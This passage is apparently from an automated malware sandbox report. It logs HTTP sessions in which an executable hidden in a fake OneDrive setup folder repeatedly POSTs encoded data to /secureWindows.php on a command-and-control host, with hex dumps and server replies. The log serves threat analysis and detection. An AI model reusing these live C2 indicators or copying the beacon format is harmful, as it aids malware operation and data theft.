                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1123351&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.449887188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:11.595199108 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:11.949229956 CET1076OUTData Raw: 57 55 59 55 55 59 53 57 58 57 50 59 55 51 5b 5c 54 5a 5c 5e 59 5c 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYUUYSWXWPYUQ[\TZ\^Y\Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8#.=+.X$-8-5$]%=3,9<Z4(&)/<5=\$86- F$,Z*
                                                        Oct 30, 2024 05:23:12.213474035 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:12.412559986 CET780INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNOQPRyYMKROXWWdyRG8qmbP8inB%2B1AyRtI3b9GcHEDAeoEutsSSpWXBMWqqxpYn6puZ733NF9wBLA89MJPvXbUESZ7PyWhxxkI9l7%2FUJEg0Dl55iMSIc9vGu4CQ3pomaG%2F39iH0MWI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0ecfcf52cb6-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1789&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=822260&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:12.412611961 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.449894188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:13.586055994 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:13.933445930 CET1076OUTData Raw: 52 54 5c 51 50 5a 56 52 58 57 50 59 55 51 5b 5e 54 58 5c 5f 59 5c 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\QPZVRXWPYUQ[^TX\_Y\ZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&80X((&0?C:%+1Y8;729<<&5]&;%X/* F$,Z*
                                                        Oct 30, 2024 05:23:14.184196949 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:14.383826017 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYY0qV16MMSgr%2BrgY6tyQJEfTvKS%2FbOj0h1jww0iAWLnWIytR1Nr5YGWIIm7sHFheUiHerQQ8cLW7WfiLloUZpdeozhDwffcFfvTIzS2pKECqoQBEpQF1eb2Q1IVnEnGqbVNXDtBJfY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0f949b0467e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=905000&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        77192.168.2.449901188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:14.513708115 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:14.870879889 CET1076OUTData Raw: 57 5e 59 52 55 55 53 56 58 57 50 59 55 5a 5b 59 54 58 5c 55 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YRUUSVXWPYUZ[YTX\UYWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&, +^2':%%[<-* [79;]%:<+653(5Z-* F$,Z*-
                                                        Oct 30, 2024 05:23:15.111637115 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:15.310664892 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zwDC2BoLnuSP5NLs8y0529V0U1xlUSvkiBozNLKjCXP8fWp0GN3IjAj6q%2FD8KZiSr5ZPqQ7Ft%2BO6Z7y%2FpNjvl9LAuXr8GdF%2FFigZNX6DCgvY%2BCYJrpe0AEy%2FvUJ4%2BIU04rvKgpDd79k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0ff1abd2e64-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1353271&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        78192.168.2.449907188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:15.437074900 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:15.792754889 CET1076OUTData Raw: 57 53 5c 56 50 5d 56 57 58 57 50 59 55 5f 5b 5a 54 52 5c 5b 59 57 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VP]VWXWPYU_[ZTR\[YWZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/1(3A:C<%=;,'4;2/(&!^0-* F$,Z*
                                                        Oct 30, 2024 05:23:16.053365946 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:16.254379988 CET791INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0R%2FPBFMe9xOoNpSxVnKEDyNqqc1Z3OKYG0Vn50I04f2WFQxLI2k6rLt%2FEfOcwuAcpQF05rucY%2B%2BbODiUHB1nx6lW7576bWGiyfcrh%2ByFZv%2FGsRHdYHMP4O7XhLC0kP9v%2Fa%2FcQfoJus%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a104f9103165-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1337&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1099468&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:16.254405975 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        79192.168.2.449913188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:16.376128912 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:16.730259895 CET1076OUTData Raw: 57 50 5c 55 50 58 53 51 58 57 50 59 55 5c 5b 5c 54 5f 5c 59 59 55 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\UPXSQXWPYU\[\T_\YYUZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;3:+^!08:0Z2=0^,8X#*?Z1<<'6.: F$,Z*5
                                                        Oct 30, 2024 05:23:16.983422995 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:17.196800947 CET798INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dLjDsmWkZWzY1rFyX17ETe%2FW9wY%2BiqwShJKSqc4wNKb%2BwUtpoZs%2BDzBCXrnd%2BxBAF95GLn5%2BDAyCBa1tAYUh7Ro5pXliWTP6JztY2JKmtF5hy%2FXfcFQ%2FMhfepq7THD3AYFz5%2FmKRtBk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a10acb20e7cf-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1060029&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        80192.168.2.449919188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:17.334767103 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        81192.168.2.449923188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:17.569257975 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:17.919337034 CET1340OUTData Raw: 57 57 59 55 55 54 56 57 58 57 50 59 55 51 5b 52 54 5f 5c 5f 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WWYUUTVWXWPYUQ[RT_\_YWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^-0&(*Z'.#95$-+;$4+Y1 <=[';*: F$,Z*
                                                        Oct 30, 2024 05:23:18.144242048 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:18.474788904 CET941INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5poFtP%2B%2FHuMmx196dKUCjJxC7DvacFBeS6cvZnNwHqkKpuT2ZKCGWwYwg7wED7WI0YiLQCDdbRg8t%2Fw009HFjt0f1SZQuLoNs%2BTHN3cT%2B1k%2FtGyxHb47YFEa4i5rMw5KV9sxPqyBmU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1120f56e5b1-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1097&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1340740&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 56 2b 01 33 09 25 23 04 1e 2b 02 0f 5b 2a 3d 3a 58 33 1f 30 1b 32 3c 25 00 2b 15 33 12 29 1a 27 03 3c 22 0d 01 21 35 34 58 29 01 2f 46 0c 10 27 12 30 0c 3b 53 28 55 2d 5c 3e 2b 27 59 22 20 3e 58 3e 5f 37 55 36 30 27 07 24 31 03 0b 3b 03 0b 0e 2d 1b 2e 5f 39 1d 09 0e 3d 00 21 57 08 14 22 5d 31 05 33 1b 27 3d 30 59 24 21 36 59 37 06 30 05 21 02 31 04 3f 2b 28 1e 26 20 38 5b 24 23 05 1e 26 2a 20 18 28 31 2c 08 32 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&V+3%#+[*=:X302<%+3)'<"!54X)/F'0;S(U-\>+'Y" >X>_7U60'$1;-._9=!W"]13'=0Y$!6Y70!1?+(& 8[$#&* (1,23"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        82192.168.2.449925188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:17.702641964 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:18.058387995 CET1076OUTData Raw: 52 54 5c 56 55 54 56 56 58 57 50 59 55 5e 5b 5c 54 5c 5c 5b 59 53 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\VUTVVXWPYU^[\T\\[YSZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z-#&X(9'=E-51$_8:,"*%]+&6'+=Z- F$,Z*=
                                                        Oct 30, 2024 05:23:18.294241905 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:18.482450962 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNP9ejwKa2x52TeTanBsNYANmae56gtyCQ03xGshd23IlN2kpsWxtzHGJwVx6kIwbcCviy7IrbGCanVD78%2FV8pdOS69iKAGv%2FA7Baszht8fuoQhd4WmOaAdynnwIjG%2Fi575axv5ltVM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a112f9da477f-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1047&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1401742&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        83192.168.2.449931188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:18.617172956 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:18.964659929 CET1076OUTData Raw: 52 57 5c 51 55 5f 56 56 58 57 50 59 55 59 5b 52 54 5e 5c 5c 59 55 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RW\QU_VVXWPYUY[RT^\\YUZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%],#%?;>Z3,:(]%=/8]#4%*3^?5'9:* F$,Z*!
                                                        Oct 30, 2024 05:23:19.211685896 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:19.511055946 CET798INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iN2%2FYuyjXK6BkUnsOuV3mq7osIlC%2BvI6U%2Bq5ATyXxDV2XgVWgaRK2cy%2FQlxBmsRT5bKdy9%2Btq3a0714J7A7vXDhAnWCYJBX0gecFCAnpU27qfvsZJh%2BJma%2FDnod%2F%2FuRs6yNu4Mk5dKY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a118be5c6bd8-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1226079&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        84192.168.2.449937188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:19.647084951 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:19.995907068 CET1076OUTData Raw: 57 54 5c 52 55 5c 53 57 58 57 50 59 55 5c 5b 52 54 5b 5c 58 59 51 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WT\RU\SWXWPYU\[RT[\XYQZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^;?8>$#C,6?23/98#*/Y2/X<*$!9: F$,Z*5
                                                        Oct 30, 2024 05:23:20.241946936 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:20.585885048 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FXdMYvmy6%2FHGtmvxv7ISmoXRCbbopLj6YY5aPso%2Fg3NSpa4hOxzL%2FyQW5r8QplLa6PAmM%2F9QWT6uMnMHJwC83argaNp21uQv2ErGetyJv1kz%2Fffcl84NllCMP29T1DflK5tDBqfNFwQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a11f2f626c2e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1308039&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:20.585978985 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        85192.168.2.449944188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:20.718799114 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
